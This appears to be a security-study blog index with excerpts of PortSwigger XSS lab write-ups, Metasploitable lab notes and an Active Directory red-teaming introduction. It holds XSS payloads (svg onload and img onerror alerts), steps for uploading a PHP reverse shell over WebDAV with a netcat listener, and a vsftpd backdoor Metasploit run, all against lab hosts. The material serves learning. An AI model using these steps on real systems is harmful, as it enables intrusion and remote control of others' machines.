Posts

Lab 2: Stored XSS into HTML context with nothing encoded

✅ Summary of the Lab (Conceptual, Safe) The referenced PortSwigger lab demonstrates a stored (persistent) Cross-Site Scripting (XSS) vulnerability in an HTML context where no characters are encoded , meaning user input is placed directly into the page. What the lab tries to teach Stored XSS occurs when malicious input is saved by the application (e.g., in a comment, profile, or post). When other users view that page, the malicious JavaScript runs in their browser. Lack of HTML encoding/escaping makes this possible. Proper output encoding and input handling prevent it. Analogy (Simple Example) Imagine a guestbook in a hotel lobby. Anyone can write a message. The hotel displays messages exactly as written. If a guest writes: “Hello World!” …it shows normally. But if someone writes: “Whenever someone reads this, switch off the lobby lights.” …and the hotel staff blindly obeys whatever the message says , the entire lobby would react. That’s similar to stored XSS— the system treats user i...
Post a Comment
Read more

Lab 1: Reflected XSS into HTML context with nothing encoded

  ✅ 1. What the Lab Is About (Simple Summary) This PortSwigger lab demonstrates reflected Cross-Site Scripting (XSS) in a page where: The server takes user input from the URL The page injects that input directly into HTML Nothing is encoded or sanitized Because of that, an attacker can craft a link that makes the browser run unintended JavaScript. The lab goal: ➡️ Inject a harmless script payload to show an alert. 🧠 2. Analogy: “The Classroom Announcer” Imagine a teacher who reads out all messages handed to them , exactly as written, without checking. If a student writes: “Today’s homework is canceled!” …the teacher reads it out loud, even though it wasn’t real. This lab is the same idea: The website takes whatever the user writes (in the URL) and announces it inside the page without checking. If someone adds: "> < script > alert ( 'XSS' ) </ script > …then the “teacher” (browser) reads it out loud and executes it. 🔍 3. How ...
Post a Comment
Read more

XSS Exploitation

Image
Exe 1: DOM XSS in document.write sink using source location.search Enter a random alphanumeric string into the search box. Right-click and inspect the element, and observe that your random string has been placed inside an img src attribute. Break out of the img attribute by searching for: "><svg onload=alert(1)> Payload: "><svg onload=alert(1)> Exe 2: DOM XSS in innerHTML sink using source location.search Enter the following into the into the search box: <img src=1 onerror=alert(1)> Click ...
Post a Comment
Read more

Lab Key Notes - AD Red Team

Attacker Machine(192.168.50.2) - Victim Machine(Metasploitable)- (192.168.50.3) Perform at Attacker Machine: nc 192.168.50.3 80  --> Victim Machine OPTIONS http://192.168.50.3 host:192.168.50.3 OPTIONS http://192.168.50.3/dav/ HTTP/1.0 host:192.168.50.3 Upload php Web Shell: cadaver http://192.168.50.3/dav/ ls /usr/share/webshells/php/ nano /usr/share/webshells/php/php-reverse-shell.php change to ip: attacker machine (192.168.50.2) port: 1234 Upload shell: put /usr/share/webshells/php/php-reverse-shell.php Get Reverse Shell: nc -nlvp 1234 Basic Commands: $ ifconfig $ /sbin/ifconfig Tool: MSFConsole  $ msfconsole $ search vsftpd $ found ==> exploit/unix/ftp/vsftpd_234_backdoor $ use exploit/unix/ftp/vsftpd_234_backdoor $ show options $ set RHOSTS 192.168.50.3 (Victim Machine)  $ set verbose true $ run Get the command shell: whoami It launches a real bash shell through Python by attaching it to a pseudo-terminal, improving interactivity compared to just running /bin/b...
Post a Comment
Read more

Active Directory - Red Teaming - Part 1

What is Red Teaming? Red teaming in Active Directory is the process of simulating real-world cyberattacks to identify weaknesses in an organization’s AD environment. It focuses on gaining initial access, escalating privileges, and moving laterally to reveal security gaps before real attackers exploit them. Red Teams are divided into 3 Groups: Red teams are typically divided into three groups: Cyber , which tests digital defenses through hacking simulations (e.g., network penetration, AD attacks); Social , which exploits human behavior using tactics like phishing or impersonation; and Physical , which attempts to bypass physical security by tailgating, lockpicking, or accessing restricted areas. Red Team Emulation Emulates (copies) the behavior of a specific real-world threat group—including their tools, techniques, and attack patterns. Example: Acting exactly like APT29, using the same phishing style, malware families, and stealthy lateral movement they are known for. Goal: Test how we...
Post a Comment
Read more